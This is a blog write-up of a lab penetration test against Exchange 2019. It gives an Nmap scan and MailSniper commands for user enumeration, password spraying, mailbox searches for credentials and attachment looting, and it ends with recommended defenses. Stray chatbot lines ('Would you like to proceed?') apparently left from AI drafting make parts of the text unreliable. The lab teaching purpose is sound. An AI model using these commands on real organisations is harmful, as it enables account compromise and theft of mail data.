Microsoft Exchange Server Penetration Testing: Techniques, Tools, and Countermeasures

Alessandro Molinari : 6 November 2025 07:03

Often, during penetration testing, we find ourselves with elevated access (Domain Admin) within an organization. Some companies stop there, thinking that obtaining Domain Admin is the ultimate goal.

But it’s not. “Getting Domain Admin” doesn’t mean much to most executives, other than demonstrating the risk it entails. One of the best ways to demonstrate the risk to an organization is to demonstrate the ability to access sensitive data.

Here we describe penetration testing of Exchange 2019 in a GOADv3 lab configured on Ludus/Debian.

Tools Used

The primary toolkit used is MailSniper , a PowerShell suite designed for internal enumeration and abuse of Exchange mailboxes via Exchange Web Services (EWS), Outlook Web Access (OWA), and other standard endpoints.

I also used NetExec from a Kali machine but MailSniper gave problems on powershell-linux and I had to rely on a Win11Pro:

Phase 1: Exchange Server Reconnaissance and Identification

Before any penetration activity, it is essential to accurately locate the Exchange server.

• It starts with OSINT collection, via DNS MX records, OWA public URLs, Autodiscover, TLS certificates, and visible metadata from work posts or public documents.
• Next, we run targeted scans with Nmap against standard services:

nmap -p25,80,443,445,587,993,995 -sV -oA exchange_scan 10.3.10.21

This scan detects SMTP, HTTPS ports for OWA, SMB, and secure mail services.

 # Nmap 7.95 scan initiated Wed Oct 15 12:52:25 2025 as: /usr/lib/nmap/nmap --privileged -A -T 4 -Pn -oA /mnt/hgfs/VMsharedDownloads/Exchange2019InitialScan 10.3.10.21
Nmap scan report for 10.3.10.21
Host is up (0.0027s latency).
Not shown: 975 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, SMTPUTF8, XRDST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
81/tcp open http Microsoft IIS httpd 10.0
|_http-title: 403 - Forbidden: Access is denied.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/https
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| http-title: Outlook
|_Requested resource was https://10.3.10.21/owa/auth/logon.aspx?url=https%3a%2f%2f10.3.10.21%2fowa%2f&reason=0
444/tcp open snpp?
445/tcp open microsoft-ds?
465/tcp open smtp Microsoft Exchange smtpd
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH GSSAPI NTLM, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info: 
| Target_Name: SEVENKINGDOMS
| NetBIOS_Domain_Name: SEVENKINGDOMS
| NetBIOS_Computer_Name: THE-EYRIE
| DNS_Domain_Name: sevenkingdoms.local
| DNS_Computer_Name: the-eyrie.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
|_ Product_Version: 10.0.17763
587/tcp open smtp Microsoft Exchange smtpd
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
808/tcp open ccproxy-http?
1801/tcp open msmq?
2103/tcp open zephyr-clt?
2105/tcp open eklogin?
2107/tcp open msmq-mgmt?
2525/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
3389/tcp open ms-wbt-server?
| rdp-ntlm-info: 
| Target_Name: SEVENKINGDOMS
| NetBIOS_Domain_Name: SEVENKINGDOMS
| NetBIOS_Computer_Name: THE-EYRIE
| DNS_Domain_Name: sevenkingdoms.local
| DNS_Computer_Name: the-eyrie.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-15T16:52:55+00:00
| ssl-cert: Subject: commonName=the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-07T10:19:37
|_Not valid after: 2026-04-08T10:19:37
3800/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
3801/tcp open mc-nmf .NET Message Framing
3828/tcp open mc-nmf .NET Message Framing
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
5986/tcp open wsmans?
| ssl-cert: Subject: commonName=WIN2019-SRV-X64
| Subject Alternative Name: DNS:WIN2019-SRV-X64, DNS:WIN2019-SRV-X64
| Not valid before: 2025-09-19T18:32:07
|_Not valid after: 2035-09-17T18:32:07
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6789/tcp open ibm-db2-admin?
Device type: general purpose
Running: Microsoft Windows 2019
CPE OS: cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2019
Network Distance: 3 hops
Service Info: Host: the-eyrie.sevenkingdoms.local; OS: Windows; CPE: cpe:/o:microsoft:windows

Mail User and Endpoint Enumeration

Invoke-DomainHarvestOWA -ExchHostname 10.3.10.21

Mail User and Endpoint Enumeration

After locating the server, we proceed with collecting valid users, which is essential for attacks such as password spraying or bruteforce.

With MailSniper you can extract users from the OWA endpoint and the Global Address List (GAL) :

Invoke-UsernameHarvestOWA -UserList .users.txt -ExchHostname 10.3.10.21 -Domain SEVENKINGDOMS -OutFile AccountsTrovati.txt

Invoke-DomainHarvestOWA -ExchHostname 10.3.10.21 -OutFile userlist.txt Get-GlobalAddressList -ExchHostname 10.3.10.21 -UserName "domainuser" -Password "Password!" -OutFile gal.txt

A well-defined user list allows you to simulate targeted attacks by testing realistic context-based passwords (e.g. Game of Thrones simulated in the lab), obviously using various OSINT techniques upstream.

Phase 3: Password Spraying and Initial Login

Using realistic passwords derived from public and contextual information, password spraying is performed with MailSniper on ActiveSync EAS, OWA or SMTP:

Invoke-PasswordSpray -UserList userlist.txt -ExchHost 10.3.10.21 -Password "ilovejaime" -OutFile spray_results.txt

The credentials are correct:

Post-Exploitation and Search for Sensitive Information

With MailSniper, from a compromised account, you can:

• Search your mailbox for illicit credentials or sensitive information:

 Invoke-SelfSearch -Mailbox [email protected] -Terms "password","vpn","confidential" 

• List attachments and download them for external analysis:

 Invoke-SelfSearch -Mailbox [email protected] -CheckAttachments -DownloadDir C:loot 

• If you have an administrative role with impersonation permissions, expand the search globally to network mailboxes:

 Invoke-GlobalMailSearch -ImpersonationAccount "domainadmin" -ExchHostname 10.3.10.21 -Terms "password","confidential" -OutputCsv all_mail_search.csv

Lateral Movement and Escalation Privileges

Accessing mailboxes allows you to search for privileged account credentials (e.g., Domain Admin), often present as attachments or messages.

With these credentials you can:

• Access internal systems via RDP or PowerShell remoting.
• Exploit techniques such as Kerberoasting (requesting a Kerberos ticket from Exchange services) to obtain hashes to crack.
• Use Exchange delegation and mailbox permissions to send “Send As” email and move around the domain.

Useful commands to control mailbox permissions:

 Invoke-MailboxPermsAudit -ExchHostname 10.3.10.21 -UserName "domainuser" -Password "password" -OutFile mailbox_permissions.csv

Recommended Defenses Against Exchange Attacks

To mitigate the risks highlighted:

• Restrict mailbox and delegation permissions : Only strictly necessary roles should be able to impersonate or send email on behalf of others.
• Exchange Activity Monitoring : In-depth logging for authentication, EWS usage, and suspicious mail attempts.
• Timely updates : Install patches against known vulnerabilities such as ProxyLogon, ProxyShell, and emerging zero-days.
• Multi-Factor Authentication (MFA) on OWA, EAS, and PowerShell remoting to reduce the effectiveness of credential stuffing.
• Network segmentation : Isolate Exchange servers and restrict access from the DMZ and internal zone based on the principles of least privilege.
• Password spray controls and lockdowns : Implement lockout policies, behavioral analysis, and internal tools to identify suspicious logons.

(Image: Network diagram with segmentation and access control)

Conclusions

Penetration testing an Exchange Server 2019 requires a complex methodology that ranges from thorough reconnaissance, through targeted attacks such as password spraying, to post-compromise mailbox abuse to gain entry into the network.

The GOADv3 lab on Ludus/Debian provides an ideal environment to safely simulate these techniques, allowing you to hone your offensive capabilities and, most importantly, test your IT defenses.

Using tools like MailSniper makes it easier to search for credentials, permissions, and sensitive data, clearly demonstrating the risk an Exchange compromise poses to an organization.

Implementing robust defenses and continuous monitoring is key to reducing the attack surface and slowing down today’s cyber adversaries.

If you’re interested, I can also provide an automated PowerShell script for some of the procedures above at a later date.

If you’d like, I can also create text with Markdown formatting for technical posts or documents. Would you like to proceed?

Sources
[1] test-art.pdf https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/104559465/763883a6-3f2a-41af-8d8a-e00efdd5acb4/test-art.pdf

Th3R3dP1ll
Cruise Director for 6 months of the year, speaks Italian, English, German, French, Spanish, Portuguese, Russian and is currently studying Japanese. He holds Comptia A+ , Network+ , Security+ Pentest+ and eJPT and he s now studying to obtain eCCPT adn PNPT. In his spare time he plays sports and reads/listens to books 60 to 120 minutes a day. He argues that with great powers come great responsibilities, such as educating those who have difficulty navigating the digital world and eventually defending them from "pirates" and entities that harm the planet and people's freedom. He also argues that the natural future of biological life is the fusion and integration with the digital, a transition that by the way has already begun with the transhumanism movement of which he is an advocate.

Lista degli articoli